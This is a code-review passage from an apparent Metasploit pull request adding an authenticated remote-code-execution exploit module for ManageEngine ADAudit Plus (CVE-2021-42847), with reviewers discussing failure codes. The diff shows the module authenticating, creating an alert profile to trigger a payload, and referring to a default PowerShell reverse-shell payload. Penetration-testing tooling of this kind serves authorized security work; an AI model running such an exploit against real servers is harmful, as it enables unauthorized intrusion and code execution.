modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb

```diff
@@ -0,0 +1,526 @@
+        @exploit_method = 'cve_2021_42847'
+        return CheckCode::Appears("The target is ADAudit Plus #{build_version} and the endpoint for CVE-2021-42847 exists.")
+      when adaudit_plus_status::CONNECTION_FAILED
+        return CheckCode::Unknown("The target is ADAudit Plus #{build_version} but the connection failed when checking for the CVE-2021-42847 endpoint")
+      when adaudit_plus_status::NO_ACCESS
+        return CheckCode::Safe("The target is ADAudit Plus #{build_version} but the endpoint for CVE-2021-42847 is not accessible.")
+      end
+    end
+
+    return CheckCode::Safe("The target is ADAudit Plus #{build_version}")
+  end
+
+  def exploit
+    if @exploit_method.nil? # this means the user has disabled autocheck so we should try the default exploit method
+      @exploit_method = 'default'
+    elsif @exploit_method == 'cve_2021_42847' && datastore['PAYLOAD'] =~ /meterpreter/
+      print_warning('Exploitation is possible only via CVE-2021-42847. This attack vector may fail in combination with a meterpreter payload.')
+      print_warning('If exploitation fails, consider setting the payload back to the default cmd/windows/powershell_reverse_tcp payload')
+    end
+
+    if @adapcsrf_cookie.blank?
+      # let's clear the cookie jar and try to authenticate
+      cookie_jar.clear
+      print_status("Attempting to authenticate to #{@domain_alias} with username: #{username} and password: #{password}")
+      login_results = adaudit_plus_login(auth_domain, username, password, false)
+      login_msg = login_results['message']
+      case login_results['status']
+      when adaudit_plus_status::CONNECTION_FAILED, adaudit_plus_status::UNEXPECTED_REPLY
+        fail_with(Failure::Unknown, login_msg)
+      when adaudit_plus_status::NO_ACCESS
+        fail_with(Failure::NoAccess, login_msg)
+      when adaudit_plus_status::NO_MATCH
+        # this means we got a cookie but no configured domains
+        print_error(login_msg)
+        print_warning('The module will proceed, but exploitation may fail.')
+      when adaudit_plus_status::SUCCESS
+        @domain = login_results['configured_domains'].first
+        vprint_status("Using domain #{@domain} for the name of the directory we will be creating")
+      end
+
+      print_good('Successfully authenticated')
+      @adapcsrf_cookie = login_results['adapcsrf_cookie']
+    end
+
+    # let's create the alert profile
+    create_alert_profile
+
+    # time to trigger the payload
+    if @domain_alias.nil?
+      # this means check didn't run, so we need to obtain the configured active directory domains
+      target_check_results = adaudit_plus_target_check
+      target_check_msg = target_check_results['message']
+      unless target_check_results['status'] == adaudit_plus_status::SUCCESS
+        print_error('Failed to obtain the configured Active Directory domain aliases')
+        fail_with(Failure::Unknown, target_check_msg)
+      end
```

Comment:
Should probably be breaking this out into seperate failure codes for CONNECTION_FAILED vs UNEXPECTED_REPLY so you can respond with an appropriate failure code. There isn't a good reason that `Failure::Unknown` be used here.

Reply:
good catch, fixed

Reply:
This needs further fixing, see my comments.

Reply:
fixed in line with your comments